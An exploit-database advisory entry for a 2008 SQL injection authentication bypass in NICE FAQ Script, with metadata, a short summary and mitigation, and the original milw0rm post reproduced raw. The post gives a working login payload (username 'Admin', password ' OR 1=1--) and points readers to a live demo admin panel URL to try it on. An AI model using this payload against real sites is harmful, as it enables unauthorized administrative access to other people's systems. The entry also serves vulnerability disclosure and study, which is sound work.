NICE FAQ Script (Auth Bypass) SQl Injection Vulnerability

vendor:

NICE FAQ Script

by:

r45c4l

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: NICE FAQ Script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

NICE FAQ Script (Auth Bypass) SQl Injection Vulnerability

A vulnerability in NICE FAQ Script allows an attacker to bypass authentication and gain access to the administrative panel. This is due to the fact that the application fails to properly sanitize user-supplied input before using it in an SQL query. An attacker can exploit this vulnerability by supplying a specially crafted username and password. The username should be set to 'Admin' and the password should be set to ' OR 1=1--'. This will cause the application to bypass authentication and grant the attacker access to the administrative panel.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of the application.

Source

Exploit-DB raw data:

################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
#- Nik-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz           #
#        and all darkc0de and DarkTrix members               --# 
################################################################ 
# 
# Author: r45c4l 
# 
# Home  : www.darkc0de.com & darktrix.info
# 
# Email : r45c4l@hotmail.com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# Title: NICE FAQ Script (Auth Bypass) SQl Injection Vulnerability
# 
# 
###########################################################
#
# Script Vendor: http://www.nicephpscripts.com/PHP-FAQ-Script-Knowledgebase-Script.htm
#
###########################################################
 
     Go To Admin Panel :

       Login With this information :

	Admin : Admin

	pass  : ' OR 1=1--


    Live Demo : 

	http://www.nicephpscripts.com/scripts/faqscript/admin/


###########################################################
#
#  Bug discovered : 06 Nov 2008
###########################################################

# milw0rm.com [2008-11-06]